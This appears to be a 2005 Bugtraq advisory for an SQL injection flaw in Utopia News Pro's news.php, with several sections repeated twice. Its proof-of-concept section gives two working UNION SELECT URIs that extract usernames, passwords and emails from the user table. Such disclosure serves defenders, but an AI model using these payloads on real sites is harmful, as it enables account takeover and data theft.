Utopia News Pro SQL Injection Vulnerability
BID:15028
Info
Utopia News Pro SQL Injection Vulnerability
| Bugtraq ID: | 15028 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 07 2005 12:00AM |
| Updated: | Oct 07 2005 12:00AM |
| Credit: | rgod is credited with the discovery of this vulnerability. |
| Vulnerable: |
Utopia News Pro Utopia News Pro 1.1.3 Utopia News Pro Utopia News Pro 1.1.2 Utopia News Pro Utopia News Pro 1.1.1 B |
| Not Vulnerable: | |
Discussion
Utopia News Pro SQL Injection Vulnerability
Utopia News Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Utopia News Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Utopia News Pro SQL Injection Vulnerability
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email,null%20FROM%20unp_user%20WHERE%20userid=1/*
The following proof of concept URI for versions prior to version 1.1.3 is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email%20FROM%20unp_user%20WHERE%20u
serid=1/*
The following exploit code is also available:
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email,null%20FROM%20unp_user%20WHERE%20userid=1/*
The following proof of concept URI for versions prior to version 1.1.3 is available:
http://www.example.com/[path]/news.php?action=printable&newsid=%27%20UNION%20SELECT%20null,'20051007',username,password,null,email%20FROM%20unp_user%20WHERE%20u
serid=1/*
The following exploit code is also available:
Solution / Fix
Utopia News Pro SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.